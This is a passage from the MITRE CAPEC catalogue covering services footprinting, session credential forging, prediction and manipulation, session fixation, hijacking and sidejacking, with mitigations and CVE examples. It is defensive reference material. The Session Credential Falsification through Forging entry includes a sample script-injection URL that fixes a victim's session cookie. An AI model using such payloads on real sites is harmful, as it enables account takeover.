[REF-644] "OWASP SSRF Bible". OWASP. 2017-01-26. <https://cheatsheetseries.owasp.org/assets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet_SSRF_Bible.pdf>. URL validated: 2021-05-17.

[REF-645] "Server Side Request Forgery". PortSwigger. <https://portswigger.net/web-security/ssrf>. URL validated: 2021-05-17.

[REF-646] "CallStranger Vulnerability". Yunus Cadirici. 2020-06-08. <https://github.com/yunuscadirci/CallStranger>. URL validated: 2021-05-17.

Content History

Submissions
Submission Date	Submitter	Organization
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)
Modifications
Modification Date	Modifier	Organization
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Execution_Flow
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances

CAPEC-574: Services Footprinting

Attack Pattern ID: 574

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	169	Footprinting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The adversary must have gained access to the target system via physical or logical means in order to carry out this attack.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Mitigations

Identify programs that may be used to acquire service information and block them by using a software restriction policy or tools that restrict program execution by uaing a process allowlist.

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1007	System Service Discovery

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, References, Related_Weaknesses, Typical_Likelihood_of_Exploit, Typical_Severity
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated @Abstraction
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Mitigations

CAPEC-196: Session Credential Falsification through Forging

Attack Pattern ID: 196

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	21	Exploitation of Trusted Identifiers
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	59	Session Credential Falsification through Prediction
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	226	Session Credential Falsification through Manipulation
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	61	Session Fixation
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	384	Application API Message Manipulation via Man-in-the-Middle

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Analyze and Understand Session IDs: The attacker finds that the targeted application use session credentials to identify legitimate users.
Techniques
An attacker makes many anonymous connections and records the session IDs.
An attacker makes authorized connections and records the session tokens or credentials.

Experiment

Create Session IDs.: Attackers craft messages containing their forged credentials in GET, POST request, HTTP headers or cookies.
Techniques
The attacker manipulates the HTTP request message and adds their forged session IDs in to the requests or cookies.

Exploit

Abuse the Victim's Session Credentials: The attacker fixates falsified session ID to the victim when victim access the system. Once the victim has achieved a higher level of privilege, possibly by logging into the application, the attacker can now take over the session using the forged session identifier.

Techniques
The attacker loads the predefined or predicted session ID into their browser and browses to protected data or functionality.
The attacker loads the predefined or predicted session ID into their software and utilizes functionality with the rights of the victim.

Prerequisites

The targeted application must use session credentials to identify legitimate users. Session identifiers that remains unchanged when the privilege levels change. Predictable session identifiers.

Skills Required

[Level: Medium]

Forge the session credential and reply the request.

Resources Required

Attackers may require tools to craft messages containing their forged credentials, and ability to send HTTP request to a web application.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality	Read Data
Authorization	Execute Unauthorized Commands
Accountability Authentication Authorization Non-Repudiation	Gain Privileges
Access Control Authorization	Bypass Protection Mechanism

Mitigations

Implementation: Use session IDs that are difficult to guess or brute-force: One way for the attackers to obtain valid session IDs is by brute-forcing or guessing them. By choosing session identifiers that are sufficiently random, brute-forcing or guessing becomes very difficult.

Implementation: Regenerate and destroy session identifiers when there is a change in the level of privilege: This ensures that even though a potential victim may have followed a link with a fixated identifier, a new one is issued when the level of privilege changes.

Example Instances

This example uses client side scripting to set session ID in the victim's browser. The JavaScript code

document.cookie="sessionid=0123456789"

fixates a falsified session credential into victim's browser, with the help of crafted a URL link.

http://www.example.com/<script>document.cookie="sessionid=0123456789";</script>

A similar example uses session ID as an argument of the URL.

http://www.example.com/index.php/sessionid=0123456789

Once the victim clicks the links, the attacker may be able to bypass authentication or piggy-back off some other authenticated victim's session.

Related Weaknesses

CWE-ID	Weakness Name
384	Session Fixation
664	Improper Control of a Resource Through its Lifetime

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1134.002	Access Token Manipulation: Create Process with Token
1134.003	Access Token Manipulation: Make and Impersonate Token
1606	Forge Web Credentials

References

[REF-62] Thomas Schreiber. "Session Riding: A Widespread Vulnerability in Today's Web Applications". SecureNet GmbH. <https://crypto.stanford.edu/cs155old/cs155-spring08/papers/Session_Riding.pdf>.

[REF-63] "OWASP Testing Guide". Testing for Session Management. v4. The Open Web Application Security Project (OWASP). <http://www.owasp.org/index.php/Testing_for_Session_Management>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Consequences, Related_Attack_Patterns, Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Execution_Flow
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances, Taxonomy_Mappings

CAPEC-226: Session Credential Falsification through Manipulation

Attack Pattern ID: 226

Abstraction: Detailed

View customized information:

Description

Extended Description

For example, a credential in the form of a web cookie might have a field that indicates the access rights of a user. By manually tweaking this cookie, a user might be able to increase their access rights to the server. Alternately an attacker may be able to manipulate an existing credential to appear as a different user. This attack differs from falsification through prediction in that the user bases their modified credentials off existing credentials instead of using patterns detected in prior credentials to create a new credential that is accepted because it fits the pattern. As a result, an attacker may be able to impersonate other users or elevate their permissions to a targeted service.

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	196	Session Credential Falsification through Forging

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Prerequisites

The targeted application must use session credentials to identify legitimate users.

Resources Required

An attacker will need tools to sniff existing credentials (possibly their own) in order to retrieve a base credential for modification. They will need to understand how the components of the credential affect server behavior and how to manipulate this behavior by changing the credential. Finally, they will need tools to allow them to craft and transmit a modified credential.

Related Weaknesses

CWE-ID	Weakness Name
565	Reliance on Cookies without Validation and Integrity Checking
472	External Control of Assumed-Immutable Web Parameter

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-59: Session Credential Falsification through Prediction

Attack Pattern ID: 59

Abstraction: Detailed

View customized information:

Description

This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	196	Session Credential Falsification through Forging

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Find Session IDs: The attacker interacts with the target host and finds that session IDs are used to authenticate users.
Techniques
An attacker makes many anonymous connections and records the session IDs assigned.
An attacker makes authorized connections and records the session tokens or credentials issued.

Characterize IDs: The attacker studies the characteristics of the session ID (size, format, etc.). As a results the attacker finds that legitimate session IDs are predictable.

Techniques
Cryptanalysis. The attacker uses cryptanalysis to determine if the session IDs contain any cryptographic protections.
Pattern tests. The attacker looks for patterns (odd/even, repetition, multiples, or other arithmetic relationships) between IDs
Comparison against time. The attacker plots or compares the issued IDs to the time they were issued to check for correlation.

Experiment

Match issued IDs: The attacker brute forces different values of session ID and manages to predict a valid session ID.
Techniques
The attacker models the session ID algorithm enough to produce a compatible session IDs, or just one match.

Exploit

Use matched Session ID: The attacker uses the falsified session ID to access the target system.

Techniques
The attacker loads the session ID into their web browser and browses to restricted data or functionality.
The attacker loads the session ID into their network communications and impersonates a legitimate user to gain access to data or functionality.

Prerequisites

The target host uses session IDs to keep track of the users.

Session IDs are used to control access to resources.

The session IDs used by the target host are predictable. For example, the session IDs are generated using predictable information (e.g., time).

Skills Required

[Level: Low]

There are tools to brute force session ID. Those tools require a low level of knowledge.

[Level: Medium]

Predicting Session ID may require more computation work which uses advanced analysis such as statistical analysis.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

Use a strong source of randomness to generate a session ID.

Use adequate length session IDs

Do not use information available to the user in order to generate session ID (e.g., time).

Ideas for creating random numbers are offered by Eastlake [RFC1750]

Encrypt the session ID if you expose it to the user. For instance session ID can be stored in a cookie in encrypted format.

Example Instances

Jetty before 4.2.27, 5.1 before 5.1.12, 6.0 before 6.0.2, and 6.1 before 6.1.0pre3 generates predictable session identifiers using java.util.random, which makes it easier for remote attackers to guess a session identifier through brute force attacks, bypass authentication requirements, and possibly conduct cross-site request forgery attacks. See also: CVE-2006-6969

mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication. See also: CVE-2001-1534

Related Weaknesses

CWE-ID	Weakness Name
290	Authentication Bypass by Spoofing
330	Use of Insufficiently Random Values
331	Insufficient Entropy
346	Origin Validation Error
488	Exposure of Data Element to Wrong Session
539	Use of Persistent Cookies Containing Sensitive Information
200	Exposure of Sensitive Information to an Unauthorized Actor
6	J2EE Misconfiguration: Insufficient Session-ID Length
285	Improper Authorization
384	Session Fixation
693	Protection Mechanism Failure

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent)

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
18	Credential/Session Prediction

Relevant to the OWASP taxonomy mapping

Entry Name
Session Prediction

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Execution_Flow
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses

CAPEC-61: Session Fixation

Attack Pattern ID: 61

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	593	Session Hijacking
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	196	Session Credential Falsification through Forging

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Setup the Attack: Setup a session: The attacker has to setup a trap session that provides a valid session identifier, or select an arbitrary identifier, depending on the mechanism employed by the application. A trap session is a dummy session established with the application by the attacker and is used solely for the purpose of obtaining valid session identifiers. The attacker may also be required to periodically refresh the trap session in order to obtain valid session identifiers.
Techniques
The attacker chooses a predefined identifier that they know.
The attacker creates a trap session for the victim.

Experiment

Attract a Victim: Fixate the session: The attacker now needs to transfer the session identifier from the trap session to the victim by introducing the session identifier into the victim's browser. This is known as fixating the session. The session identifier can be introduced into the victim's browser by leveraging cross site scripting vulnerability, using META tags or setting HTTP response headers in a variety of ways.

Techniques
Attackers can put links on web sites (such as forums, blogs, or comment forms).
Attackers can establish rogue proxy servers for network protocols that give out the session ID and then redirect the connection to the legitimate service.
Attackers can email attack URLs to potential victims through spam and phishing techniques.

Exploit

Abuse the Victim's Session: Takeover the fixated session: Once the victim has achieved a higher level of privilege, possibly by logging into the application, the attacker can now take over the session using the fixated session identifier.

Techniques
The attacker loads the predefined session ID into their browser and browses to protected data or functionality.
The attacker loads the predefined session ID into their software and utilizes functionality with the rights of the victim.

Prerequisites

Session identifiers that remain unchanged when the privilege levels change.

Permissive session management mechanism that accepts random user-generated session identifiers

Predictable session identifiers

Skills Required

[Level: Low]

Only basic skills are required to determine and fixate session identifiers in a user's browser. Subsequent attacks may require greater skill levels depending on the attackers' motives.

Resources Required

None: No specialized resources are required to execute this type of attack.

Indicators

There are no indicators for the server since a fixated session identifier is similar to an ordinarily generated one. However, too many invalid sessions due to invalid session identifiers is a potential warning.

A client can be suspicious if a received link contains preset session identifiers. However, this depends on the client's knowledge of such an issue. Also, fixation through Cross Site Scripting or hidden form fields is usually difficult to detect.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

Use a strict session management mechanism that only accepts locally generated session identifiers: This prevents attackers from fixating session identifiers of their own choice.

Regenerate and destroy session identifiers when there is a change in the level of privilege: This ensures that even though a potential victim may have followed a link with a fixated identifier, a new one is issued when the level of privilege changes.

Use session identifiers that are difficult to guess or brute-force: One way for the attackers to obtain valid session identifiers is by brute-forcing or guessing them. By choosing session identifiers that are sufficiently random, brute-forcing or guessing becomes very difficult.

Example Instances

Consider a banking application that issues a session identifier in the URL to a user before login, and uses the same identifier to identify the customer following successful authentication. An attacker can easily leverage session fixation to access a victim's account by having the victim click on a forged link that contains a valid session identifier from a trapped session setup by the attacker. Once the victim is authenticated, the attacker can take over the session and continue with the same levels of privilege as the victim.

An attacker can hijack user sessions, bypass authentication controls and possibly gain administrative privilege by fixating the session of a user authenticating to the Management Console on certain versions of Macromedia JRun 4.0. This can be achieved by setting the session identifier in the user's browser and having the user authenticate to the Management Console. Session fixation is possible since the application server does not regenerate session identifiers when there is a change in the privilege levels. See also: CVE-2004-2182

Related Weaknesses

CWE-ID	Weakness Name
384	Session Fixation
664	Improper Control of a Resource Through its Lifetime
732	Incorrect Permission Assignment for Critical Resource

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent)

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
37	Session Fixation

Relevant to the OWASP taxonomy mapping

Entry Name
Session fixation

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

[REF-601] "OWASP Web Security Testing Guide". Testing for Session Fixation. The Open Web Application Security Project (OWASP). <https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/03-Testing_for_Session_Fixation.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Execution_Flow
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References, Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses

CAPEC-593: Session Hijacking

Attack Pattern ID: 593

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	21	Exploitation of Trusted Identifiers
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	60	Reusing Session IDs (aka Session Replay)
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	61	Session Fixation
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	102	Session Sidejacking
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	107	Cross Site Tracing
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	33	HTTP Request Smuggling
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	34	HTTP Response Splitting
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	105	HTTP Request Splitting
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	273	HTTP Response Smuggling

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Discover Existing Session Token: Through varrying means, an adversary will discover and store an existing session token for some other authenticated user session.

Experiment

Insert Found Session Token: The attacker attempts to insert a found session token into communication with the targeted application to confirm viability for exploitation.

Exploit

Session Token Exploitation: The attacker leverages the captured session token to interact with the targeted application in a malicious fashion, impersonating the victim.

Prerequisites

An application that leverages sessions to perform authentication.

Skills Required

[Level: Low]

Exploiting a poorly protected identity token is a well understood attack with many helpful resources available.

Resources Required

The adversary must have the ability to communicate with the application over the network.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Gain Privileges

Mitigations

Properly encrypt and sign identity tokens in transit, and use industry standard session key generation mechanisms that utilize high amount of entropy to generate the session key. Many standard web and application servers will perform this task on your behalf. Utilize a session timeout for all sessions. If the user does not explicitly logout, terminate their session after this period of inactivity. If the user logs back in then a new session key should be generated.

Related Weaknesses

CWE-ID	Weakness Name
287	Improper Authentication

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1185	Browser Session Hijacking
1550.001	Use Alternate Authentication Material:Application Access Token
1563	Remote Service Session Hijacking

Relevant to the OWASP taxonomy mapping

Entry Name
Session hijacking attack

References

[REF-603] "OWASP Web Security Testing Guide". Testing for Session Hijacking. The Open Web Application Security Project (OWASP). <https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/09-Testing_for_Session_Hijacking.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2017-04-15 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-04-15 (Version 2.9)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Examples-Instances, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Description, Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References, Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Taxonomy_Mappings
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Execution_Flow
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-102: Session Sidejacking

Attack Pattern ID: 102

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	593	Session Hijacking

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Detect Unprotected Session Token Transfer: The attacker sniffs on the wireless network to detect unencrypted traffic that contains session tokens.

Techniques
The attacker uses a network sniffer tool like ferret or hamster to monitor the wireless traffic at a WiFi hotspot while examining it for evidence of transmittal of session tokens in unencrypted or recognizably encrypted form. An attacker applies their knowledge of the manner by which session tokens are generated and transmitted by various target systems to identify the session tokens.

Experiment

Capture session token: The attacker uses sniffing tools to capture a session token from traffic.
Insert captured session token: The attacker attempts to insert a captured session token into communication with the targeted application to confirm viability for exploitation.

Exploit

Session Token Exploitation: The attacker leverages the captured session token to interact with the targeted application in a malicious fashion, impersonating the victim.

Prerequisites

An attacker and the victim are both using the same WiFi network.

The victim has an active session with a target system.

The victim is not using a secure channel to communicate with the target system (e.g. SSL, VPN, etc.)

The victim initiated communication with a target system that requires transfer of the session token or the target application uses AJAX and thereby periodically "rings home" asynchronously using the session token

Skills Required

[Level: Low]

Easy to use tools exist to automate this attack.

Resources Required

A packet sniffing tool, such as wireshark, can be used to capture session information.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authorization	Gain Privileges
Integrity	Modify Data
Confidentiality	Read Data
Availability	Unreliable Execution

Mitigations

Make sure that HTTPS is used to communicate with the target system. Alternatively, use VPN if possible. It is important to ensure that all communication between the client and the server happens via an encrypted secure channel.

Modify the session token with each transmission and protect it with cryptography. Add the idea of request sequencing that gives the server an ability to detect replay attacks.

Example Instances

The attacker and the victim are using the same WiFi public hotspot. When the victim connects to the hotspot, they has a hosted e-mail account open. This e-mail account uses AJAX on the client side which periodically asynchronously connects to the server side and transfers, amongst other things, the user's session token to the server. The communication is supposed to happen over HTTPS. However, the configuration in the public hotspot initially disallows the HTTPS connection (or any other connection) between the victim and the hosted e-mail servers because the victim first needs to register with the hotspot. The victim does so, but their e-mail client already defaulted to using a connection without HTTPS, since it was denied access the first time. Victim's session token is now flowing unencrypted between the victim's browser and the hosted e-mail servers. The attacker leverages this opportunity to capture the session token and gain access to the victim's hosted e-mail account.

Related Weaknesses

CWE-ID	Weakness Name
294	Authentication Bypass by Capture-replay
522	Insufficiently Protected Credentials
523	Unprotected Transport of Credentials
319	Cleartext Transmission of Sensitive Information
614	Sensitive Cookie in HTTPS Session Without 'Secure' Attribute

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Example_Instances, Execution_Flow

CAPEC-124: Shared Resource Manipulation

Attack Pattern ID: 124

Abstraction: Meta

View customized information:

